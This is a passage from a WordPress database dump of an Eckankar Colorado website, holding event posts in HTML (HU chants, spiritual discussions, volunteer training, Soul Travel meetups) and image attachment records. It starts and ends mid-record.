10:23:10','2023-07-29 16:23:10','',268839,'https://eckankar-colorado.org/wp-content/uploads/2023/07/looking-at-light-3.jpg',0,'attachment','image/jpeg',0),(268843,2,'2023-08-31 12:45:57','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here','','draft','closed','closed','','','','','2023-08-31 12:45:57','2023-08-31 18:45:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268843',0,'mec-events','',0),(268844,2,'2023-07-29 11:06:56','2023-07-29 17:06:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Balance in Challenging Times','','publish','closed','closed','','spiritual-balance-in-challenging-times','','','2023-07-29 11:07:44','2023-07-29 17:07:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268844',0,'mec-events','',0),(268846,2,'2023-07-29 11:19:53','2023-07-29 17:19:53','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We invite all So CO chelas to join us for a discussion of the June 2023 edition of the Mystic World. Please have your copy on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\" <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion','','publish','closed','closed','','mystic-world-discussion-2','','','2023-07-29 11:23:11','2023-07-29 17:23:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268846',0,'mec-events','',0),(268845,2,'2023-07-29 11:06:18','2023-07-29 17:06:18','','rocks-balance-1','','inherit','closed','closed','','rocks-balance-1','','','2023-07-29 11:06:18','2023-07-29 17:06:18','',268844,'https://eckankar-colorado.org/wp-content/uploads/2023/07/rocks-balance-1.jpg',0,'attachment','image/jpeg',0),(268848,2,'2023-07-29 11:53:49','2023-07-29 17:53:49','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #1d5791; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Serving the ECK is a way of Life. It is the gathering of sacred forces, of qualities, of eons of desire to live as a conscious Coworker with the MAHANTA.<br>\r\nThese guidelines help you fulfill your role as an ECK volunteer.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\">— Spiritual Duties of the ECK Volunteer, p.1<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Discover how to do and be your very best in service as you work towards ECK Mastership. Spiritual Duties of the ECK Volunteer training is open to all ECK members in good standing and is required for those who wish to become Arahatas. </span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Thursday, August 31</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">6:30 p.m. - 8:15 p.m.</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Online via Zoom</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">To prepare for this training, please read and contemplate on the <em>Spiritual Duties of ECK Volunteer</em>&nbsp;booklet (2022).</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">To download a free, electronic copy of this booklet, go to the </span><span class=\"\" style=\"font-size: 14pt;\"><a href=\"https://www.eckankar.org/members/\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?hl=en&amp;q=https://www.eckankar.org/members/&amp;source=gmail&amp;ust=1690512158722000&amp;usg=AOvVaw1e7wwrH6m1ffprTt16EE-d\">Initiate Pages area of the Eckankar website</a></span><span class=\"\" style=\"font-size: 14pt;\">, log in as a member, click on ECK Leadership &amp; Guidelines&nbsp; <em>,</em>&nbsp;then Guidelines for&nbsp;ECK Members. Scroll down to find a link to&nbsp; <em>Spiritual Duties of the ECK Volunteer</em>.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span style=\"font-size: 14pt;\">To purchase a physical copy of this booklet, please go to </span><span class=\"\" style=\"font-size: 14pt;\"><a href=\"https://www.eckbooks.org/\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?hl=en&amp;q=https://www.eckbooks.org&amp;source=gmail&amp;ust=1690512158722000&amp;usg=AOvVaw0MNP6zZrx_UpwoWcDbz-24\">ECKBooks.org,</a></span><span class=\"\" style=\"font-size: 14pt;\"> log in as a member, and search for <em>Spiritual Duties of the&nbsp;ECK Volunteer.</em></span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">There will be small group discussions and slides presented during this training. Attendance via the Zoom app on your computer or mobile device is recommended. You may also attend by calling in.&nbsp;</span></div>\r\n<br>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We look forward to seeing you in class!</span></p>\r\n<p class=\"\"><span class=\"\" style=\"color: #1d5791; font-size: 18pt;\"><strong>See the current \'Chela Newsletter\' for login information.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Duties of the ECK Volunteer Training','','publish','closed','closed','','spiritual-duties-of-the-eck-volunteer-training','','','2023-07-29 12:22:05','2023-07-29 18:22:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268848',0,'mec-events','',0),(268850,2,'2023-07-29 12:02:58','0000-00-00 00:00:00','<div><span style=\"font-size: 18pt; color: #f28a27;\"><strong>Save the Date!!</strong></span></div>\n<div>\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong><span style=\"color: #23507d;\">Founder’s Day Celebration Satsang Intensive</span> </strong></span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Come and check out the new Colorado Springs&nbsp;ECK Center on the 3<sup>rd</sup>&nbsp;Sunday, September 17<sup>th</sup>.</span></p>\n<ul>\n	<li><span style=\"font-size: 14pt;\">Take advantage of the opportunity to renew your enthusiasm for the sacred teachings of&nbsp;ECK.&nbsp;</span></li>\n	<li><span style=\"font-size: 14pt;\">Invite true contemplation with the Inner Master, as you explore in depth a special adaptation from <em>The Shariyat</em>, </span><span style=\"font-size: 14pt;\">“The&nbsp;Mahanta and You.”&nbsp;&nbsp;</span></li>\n	<li><span style=\"font-size: 14pt;\">For September Silent Auction items bring something worth at least $5. They can be brought to the ECK Center any Sunday.&nbsp;</span></li>\n</ul>\n</div>','Founder’s Day Celebration Satsang Intensive','','draft','closed','closed','','','','','2023-07-29 12:02:58','2023-07-29 18:02:58','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268850',0,'mec-events','',0),(268855,2,'2023-07-29 12:21:56','2023-07-29 18:21:56','','spir-duties-ek-volunteer-5','','inherit','closed','closed','','spir-duties-ek-volunteer-5','','','2023-07-29 12:21:56','2023-07-29 18:21:56','',268848,'https://eckankar-colorado.org/wp-content/uploads/2023/07/spir-duties-ek-volunteer-5.jpg',0,'attachment','image/jpeg',0),(268948,2,'2023-08-30 09:15:34','2023-08-30 15:15:34','','HU-chela-master-1','','inherit','closed','closed','','hu-chela-master-1','','','2023-08-30 09:15:34','2023-08-30 15:15:34','',268947,'https://eckankar-colorado.org/wp-content/uploads/2023/08/HU-chela-master-1.jpg',0,'attachment','image/jpeg',0),(268857,2,'2023-07-29 12:34:21','2023-07-29 18:34:21','','balance-4','','inherit','closed','closed','','balance-4','','','2023-08-02 10:45:38','2023-08-02 16:45:38','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/07/balance-4.jpg',0,'attachment','image/jpeg',0),(268946,0,'2023-08-30 07:39:26','2023-08-30 13:39:26','','','','publish','closed','closed','','268946','','','2023-08-30 07:39:26','2023-08-30 13:39:26','',0,'https://eckankar-colorado.org/nf_sub/268946/',0,'nf_sub','',0),(268947,2,'2023-08-30 09:16:23','2023-08-30 15:16:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Good Karma, Bad Karma, Beyond Karma','','publish','closed','closed','','good-karma-bad-karma-beyond-karma-2','','','2023-08-30 09:24:02','2023-08-30 15:24:02','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268947',0,'mec-events','',0),(268859,2,'2023-07-29 12:40:57','2023-07-29 18:40:57','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #1d5791; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Serving the ECK is a way of Life. It is the gathering of sacred forces, of qualities, of eons of desire to live as a conscious Coworker with the MAHANTA.<br>\r\nThese guidelines help you fulfill your role as an ECK volunteer.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\">— Spiritual Duties of the ECK Volunteer, p.1<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Discover how to do and be your very best in service as you work towards ECK Mastership. Spiritual Duties of the ECK Volunteer training is open to all ECK members in good standing and is required for those who wish to become Arahatas. </span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Thursday, August 31</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">6:30 p.m. - 8:15 p.m.</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Online via Zoom</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">To prepare for this training, please read and contemplate on the <em>Spiritual Duties of ECK Volunteer</em>&nbsp;booklet (2022).</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">To download a free, electronic copy of this booklet, go to the </span><span class=\"\" style=\"font-size: 14pt;\"><a href=\"https://www.eckankar.org/members/\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?hl=en&amp;q=https://www.eckankar.org/members/&amp;source=gmail&amp;ust=1690512158722000&amp;usg=AOvVaw1e7wwrH6m1ffprTt16EE-d\">Initiate Pages area of the Eckankar website</a></span><span class=\"\" style=\"font-size: 14pt;\">, log in as a member, click on ECK Leadership &amp; Guidelines&nbsp; <em>,</em>&nbsp;then Guidelines for&nbsp;ECK Members. Scroll down to find a link to&nbsp; <em>Spiritual Duties of the ECK Volunteer</em>.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span style=\"font-size: 14pt;\">To purchase a physical copy of this booklet, please go to </span><span class=\"\" style=\"font-size: 14pt;\"><a href=\"https://www.eckbooks.org/\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?hl=en&amp;q=https://www.eckbooks.org&amp;source=gmail&amp;ust=1690512158722000&amp;usg=AOvVaw0MNP6zZrx_UpwoWcDbz-24\">ECKBooks.org,</a></span><span class=\"\" style=\"font-size: 14pt;\"> log in as a member, and search for <em>Spiritual Duties of the&nbsp;ECK Volunteer.</em></span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">There will be small group discussions and slides presented during this training. Attendance via the Zoom app on your computer or mobile device is recommended. You may also attend by calling in.&nbsp;</span></div>\r\n<br>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We look forward to seeing you in class!</span></p>\r\n<p class=\"\"><span class=\"\" style=\"color: #1d5791; font-size: 18pt;\"><strong>See the current \'Chela Newsletter\' for login information.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Duties of the ECK Volunteer Training','','publish','closed','closed','','spiritual-duties-of-the-eck-volunteer-training-2','','','2023-07-29 12:40:57','2023-07-29 18:40:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268859',0,'mec-events','',0),(268657,2,'2023-06-18 14:24:42','2023-06-18 20:24:42','','2023-regional-sas-webpromo-bk-1','','inherit','closed','closed','','2023-regional-sas-webpromo-bk-1','','','2023-06-18 14:24:42','2023-06-18 20:24:42','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-sas-webpromo-bk-1.jpg',0,'attachment','image/jpeg',0),(268713,1000088,'2023-07-02 10:30:00','2023-07-02 16:30:00','','Jeff Law - lawless80537@gmail.com','','publish','closed','closed','','jeff-law-lawless80537gmail-com','','','2023-07-02 10:30:00','2023-07-02 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268713',0,'mec-books','',0),(268661,15,'2023-06-19 08:54:26','2023-06-19 14:54:26','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt;\">Soul Travel for Divine Love and Wisdom.</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>You can expand your consciousness.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">How, you might ask? One of the ways to grow in awareness is through Soul Travel.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Soul Travel is a shift in awareness, a change of consciousness, moving closer to God.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Although in truth Soul doesn’t actually “go” anywhere, Soul travel describes the experience of accepting greater states of being.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Broadening your viewpoint from even higher vantage points brings upliftment, problem-solving skills, and endless opportunities for spiritual adventure.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">People who’ve experienced Soul Travel often say it happened to them spontaneously. They’d like to return to that blissful state.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Closely related to dreaming, Soul Travel is a natural ability. It is a spiritual practice that enables you to explore the vast inner worlds of your own being whenever and wherever you like. Anyone can have Soul Travel experiences.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join the Spiritual Experiences Group of Pagosa Springs on July 9 at 1:00p for a lively discussion on&nbsp;<em>Easy Techniques to Expand Your Awareness: Soul Travel for Divine Love, Wisdom, and Freedom</em>. We will meet at the Pagosa Lakes Clubhouse, 230 Port Ave, in Pagosa Springs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This free event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service; a spiritual resource for people of all faiths and beliefs. It is an individual, creative practice to experience our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To read more about Soul Travel:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/soul-travel/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Experience Soul Travel</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/294284333\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Easy Techniques to Expand Your Awareness','','publish','closed','closed','','title-goes-herein-person-discussion-meetup-template-562','','','2023-06-20 13:23:20','2023-06-20 19:23:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268661',0,'mec-events','',0),(268667,2,'2023-06-20 11:20:38','2023-06-20 17:20:38','','Carousel - Liquid Layout View','','publish','closed','closed','','carousel-liquid-layout-view','','','2023-11-20 13:55:01','2023-11-20 20:55:01','',0,'https://eckankar-colorado.org/?post_type=mec_calendars&#038;p=268667',0,'mec_calendars','',0),(268685,2,'2023-06-23 22:03:18','2023-06-24 04:03:18','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Easy Ways to Connect with Spirit Everyday.<br>\r\n</span></strong></span><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 15pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Develop a Powerful Spiritual Practice','','publish','closed','closed','','develop-a-powerful-spiritual-practice','','','2023-06-28 21:21:06','2023-06-29 03:21:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268685',0,'mec-events','',0),(268691,2,'2023-06-26 10:00:53','2023-06-26 16:00:53','','sa-events-img-2','','inherit','closed','closed','','sa-events-img-2','','','2023-06-26 10:00:53','2023-06-26 16:00:53','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/sa-events-img-2.jpg',0,'attachment','image/jpeg',0),(268678,15,'2023-06-22 21:59:54','2023-06-23 03:59:54','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"color: #ce6700;\"><strong><span style=\"font-size: 18pt;\">Easy Ways to Connect with Spirit Everyday.</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/294303847/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Develop a Powerful Spiritual Practice','','publish','closed','closed','','develop-a-powerful-spiritual-practice-easy-ways-to-connect-with-spirit-everydayspiritual-discussion','','','2023-06-24 21:24:54','2023-06-25 03:24:54','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268678',0,'mec-events','',0),(268680,15,'2023-06-22 22:06:46','2023-06-23 04:06:46','','Butterfly','','inherit','closed','closed','','butterfly','','','2023-06-22 22:06:46','2023-06-23 04:06:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/Butterfly.webp',0,'attachment','image/webp',0),(268950,2,'2023-08-30 09:33:20','2023-08-30 15:33:20','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Open Your Heart with the HU Mantra.<br>\r\n</span></strong></span><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Here are some of the many benefits of HU:</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\r\n</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 12pt;\">COVID-19 Safety Measures</span></strong><br>\r\n<span style=\"font-size: 12pt;\">Event will be indoors.</span><br>\r\n<span style=\"font-size: 12pt;\">We follow El Paso County. guidelines regarding Covid-19. Do what you think is best to protect your health.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Passkey to the Inner Worlds','','publish','closed','closed','','passkey-to-the-inner-worlds-2','','','2023-08-30 09:35:59','2023-08-30 15:35:59','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268950',0,'mec-events','',0),(268951,2,'2023-08-30 09:31:27','2023-08-30 15:31:27','','sky-above-columns-1','','inherit','closed','closed','','sky-above-columns-1','','','2023-08-30 09:31:27','2023-08-30 15:31:27','',268950,'https://eckankar-colorado.org/wp-content/uploads/2023/08/sky-above-columns-1.jpg',0,'attachment','image/jpeg',0),(269366,0,'2023-11-05 19:44:12','2023-11-06 02:44:12','','','','publish','closed','closed','','269366','','','2023-11-05 19:44:12','2023-11-06 02:44:12','',0,'https://eckankar-colorado.org/nf_sub/269366/',0,'nf_sub','',0),(269367,0,'2023-11-06 12:51:54','2023-11-06 19:51:54','','','','publish','closed','closed','','269367','','','2023-11-06 12:51:54','2023-11-06 19:51:54','',0,'https://eckankar-colorado.org/nf_sub/269367/',0,'nf_sub','',0),(268953,2,'2023-08-30 09:51:50','2023-08-30 15:51:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Does this spiritual law affect your life today?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Did you know your past lives can be causes of Karmic challenges in this life?<br>\r\n</strong>If we start with the idea that life has a spiritual purpose and that we are here to learn what we were created to be, then ideas of karma, desire, attachment, and reincarnation have real meaning and impact in our lives.</span></p>\r\n<ul class=\"\">\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you recall a past life, drawn to people and places for unknown reasons?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you have skills or a talent you didn’t have to work at?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 